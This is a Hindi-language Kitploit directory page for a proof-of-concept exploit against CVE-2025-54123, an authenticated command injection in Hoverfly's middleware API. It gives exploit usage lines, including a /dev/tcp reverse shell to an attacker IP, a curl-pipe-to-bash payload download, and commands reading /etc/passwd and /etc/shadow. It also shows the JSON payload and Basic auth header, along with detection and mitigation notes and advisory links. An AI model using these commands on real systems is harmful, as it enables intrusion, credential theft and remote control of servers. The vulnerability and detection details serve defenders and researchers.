Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly Authenticated Middleware Command Injection RCE | Kitploit
उपकरण/GitHubGitHub/kasem545/cve-2025-54123-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly Authenticated Middleware Command Injection RCE

रिपॉजिटरी देखें
74 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54123 शोषण

Hoverfly प्रमाणीकृत मिडलवेयर कमांड इंजेक्शन RCE | CVSS 9.8 गंभीर

कमजोरी

Hoverfly <= 1.11.3, /api/v2/hoverfly/middleware एंडपॉइंट के माध्यम से प्रमाणीकृत कमांड इंजेक्शन के लिए संवेदनशील है। व्यवस्थापक क्रेडेंशियल्स आवश्यक हैं, लेकिन एक बार प्रमाणीकृत होने पर, मिडलवेयर कार्यक्षमता उपयोगकर्ता द्वारा प्रदान किए गए बाइनरी और स्क्रिप्ट मानों को बिना सत्यापन के स्वीकार कर लेती है, जिससे मनमाना कमांड निष्पादन संभव हो जाता है।

कमजोरी श्रृंखला

  1. अपर्याप्त इनपुट सत्यापन - middleware.go मनमाना बाइनरी पथ स्वीकार करता है
  2. असुरक्षित कमांड निष्पादन - local_middleware.go सीधे उपयोगकर्ता इनपुट को exec.Command() में पास करता है
  3. तत्काल निष्पादन - hoverfly_service.go सत्यापन के दौरान मिडलवेयर निष्पादित करता है

आवश्यकताएँ

  • वैध Hoverfly व्यवस्थापक क्रेडेंशियल्स (उपयोगकर्ता नाम/पासवर्ड)
  • Hoverfly व्यवस्थापक API तक पहुंच (डिफ़ॉल्ट पोर्ट 8888)

उपयोग

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Hoverfly API एंडपॉइंट (आवश्यक)
  • -u, --username - व्यवस्थापक उपयोगकर्ता नाम (आवश्यक)
  • -p, --password - व्यवस्थापक पासवर्ड (आवश्यक)
  • -c, --command - निष्पादित करने का आदेश (आवश्यक)
  • --shell - उपयोग करने के लिए शेल बाइनरी (डिफ़ॉल्ट: /bin/bash)

उदाहरण

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

आक्रमण प्रवाह

  1. हमलावर वैध व्यवस्थापक क्रेडेंशियल्स (बेसिक ऑथ) के साथ प्रमाणीकरण करता है
  2. दुर्भावनापूर्ण पेलोड के साथ /api/v2/hoverfly/middleware पर PUT अनुरोध भेजता है
  3. Hoverfly स्क्रिप्ट को अस्थायी फ़ाइल /tmp/hoverfly_<random> पर लिखता है
  4. सत्यापन के दौरान, निष्पादित करता है: <shell> /tmp/hoverfly_<random>
  5. कमांड आउटपुट त्रुटि प्रतिक्रिया के STDOUT अनुभाग में लौटाया जाता है
  6. शोषण आउटपुट निकालता और प्रदर्शित करता है

पेलोड संरचना

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

HTTP हेडर में शामिल हैं:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

प्रभाव

  • Hoverfly प्रक्रिया विशेषाधिकारों के साथ पूर्ण रिमोट कोड निष्पादन
  • क्रेडेंशियल चोरी - API कुंजियाँ, टोकन, रहस्य चुराना
  • आंतरिक नेटवर्क पिवट - आसन्न सिस्टम से समझौता
  • डेटा एक्सफिल्ट्रेशन - सिमुलेशन डेटा, कॉन्फ़िगरेशन तक पहुंच
  • स्थिरता - बैकडोर स्थापित करना, पहुंच बनाए रखना
  • सेवा व्यवधान - मिडलवेयर कॉन्फ़िगरेशन को संशोधित/हटाना

संवेदनशील कोड स्थान

  • core/middleware/middleware.go:94-96 - बाइनरी पैरामीटर पर कोई इनपुट सत्यापन नहीं
  • core/middleware/local_middleware.go:14-19 - असुरक्षित exec.Command() उपयोग
  • core/hoverfly_service.go:173 - सत्यापन के दौरान तत्काल निष्पादन

प्रभावित संस्करण

  • Hoverfly <= 1.11.3
  • सभी इंस्टॉलेशन जहां व्यवस्थापक API सुलभ है और प्रमाणीकरण सक्षम है

पहचान

इनकी तलाश करें:

  • /api/v2/hoverfly/middleware पर PUT अनुरोध
  • कमांड आउटपुट के साथ "STDOUT:" युक्त त्रुटि प्रतिक्रियाएँ
  • /tmp/hoverfly/ में अस्थायी फ़ाइलें
  • hoverfly सेवा से असामान्य प्रक्रिया निष्पादन

शमन

  • पैच किए गए संस्करण में अपग्रेड करें (यदि उपलब्ध हो)
  • व्यवस्थापक API तक पहुंच को केवल विश्वसनीय IP तक सीमित करें
  • मजबूत प्रमाणीकरण क्रेडेंशियल्स का उपयोग करें
  • /api/v2/hoverfly/middleware एंडपॉइंट एक्सेस की निगरानी करें
  • बाइनरी/स्क्रिप्ट पैरामीटर पर इनपुट सत्यापन लागू करें

संदर्भ

  • CVE-2025-54123
  • CWE-78 (OS कमांड इंजेक्शन)
  • CWE-20 (अनुचित इनपुट सत्यापन)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

क्रेडिट

मूल खोज: @Kr1shna4garwal

टूल डाउनलोड करें